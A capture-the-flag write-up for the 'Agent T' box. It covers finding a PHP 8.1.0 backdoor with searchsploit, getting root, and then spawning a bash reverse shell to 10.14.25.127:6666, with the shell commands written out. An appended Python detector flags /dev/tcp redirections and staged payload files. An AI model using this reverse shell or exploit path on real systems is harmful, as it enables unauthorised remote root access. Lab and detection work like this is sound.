Agent T

Non Spoiler Nudge

  1. Check your Nmap scan closely or get Wappalyzer
  2. Searchsploit will help

Attack Path

  1. PHP
  2. Bash Rev Shell

Well it looks like we are only working with one port. Let's head to the interwebs and check it out.

Looks like a dashboard for a web app. Cool but it seems like nothing really works. Source code doesn't really show anything either. To the Fuzzers we go!

Okay, since our fuzzing didn't show anything we kind of have to start poking around on the web app a little more. Let's use Wappalyzer to see what's running under the hood. Not a whole lot but let's start running these against searchsploit to see if anything pops up.

We get a hit on PHP 8.1.0. Okay, cool, let's grab this .py and see what it does.

Sweet, a backdoor? This might be pretty cool.

Doesn't look like it's doing anything too crazy. Let's run it and see if it works.

Well that was easy!

WE ARE ROOT!

Okay, we are root and that is cool, but like the exploit said, we have a limited shell. We can still cat out the root flag and be done; however, I am not satisfied. I need a real root shell before I walk away.

So, first I set up a netcat listener on port 6666. Next I started trying out different shells to send back to me. The one below worked beautifully!

On the target machine:

echo "bash -i >& /dev/tcp/10.14.25.127/6666 0>&1" > shell.sh

chmod +x shell.sh

bash ./shell.sh

As you can see we get a full root shell on our listener! Now.....

WE ARE ROOT!!!
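From the defender's side, the three commands above leave a recognisable trail. The following is an added example, not part of the original write-up: a small detector that scans command-line records for bash's /dev/tcp redirection and then follows the payload file once it has been written to disk. The record format (pid, uid, command string) and the sample lines are constructed for illustration, reusing the commands shown on this page.

```python
import re
from typing import NamedTuple

# bash's /dev/tcp (or /dev/udp) pseudo-device followed by host and port
DEV_NET = re.compile(r"/dev/(tcp|udp)/([A-Za-z0-9.\-:]+)/(\d{1,5})")
# trailing "> file" or ">> file"; skips fd duplications such as ">&" and "0>&1"
WRITES_FILE = re.compile(r"(?<![0-9&>])>{1,2}\s*([^\s&|;>]+)\s*$")

class Alert(NamedTuple):
    pid: int
    uid: int
    reason: str   # "direct", "staged" or "staged-file-used"
    dest: str     # host:port/proto taken from the /dev/tcp path

def scan(events):
    """events: iterable of (pid, uid, cmdline) tuples. Returns a list of Alert."""
    alerts, staged = [], {}            # staged: file basename -> destination
    for pid, uid, cmd in events:
        m = DEV_NET.search(cmd)
        if m:
            dest = f"{m.group(2)}:{m.group(3)}/{m.group(1)}"
            w = WRITES_FILE.search(cmd)
            if w:                      # payload written to a file, as in the write-up
                staged[w.group(1).split("/")[-1]] = dest
                alerts.append(Alert(pid, uid, "staged", dest))
            else:                      # payload run straight from the command line
                alerts.append(Alert(pid, uid, "direct", dest))
            continue
        # Later use of the staged file never shows /dev/tcp in its own
        # command line, so correlate on the file name instead.
        for token in cmd.split():
            name = token.split("/")[-1]
            if name in staged:
                alerts.append(Alert(pid, uid, "staged-file-used", staged[name]))
                break
    return alerts

# Constructed sample records (pid, uid, command string); uid 0 is root.
SAMPLE = [
    (4100, 0, "cat /etc/hostname"),
    (4101, 0, 'echo "bash -i >& /dev/tcp/10.14.25.127/6666 0>&1" > shell.sh'),
    (4102, 0, "chmod +x shell.sh"),
    (4103, 0, "bash ./shell.sh"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```

A rule that only matches /dev/tcp on the executing command line would miss `bash ./shell.sh` entirely, which is why the file name is carried forward from the `echo` record.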

Hope you enjoyed! Happy Hacking!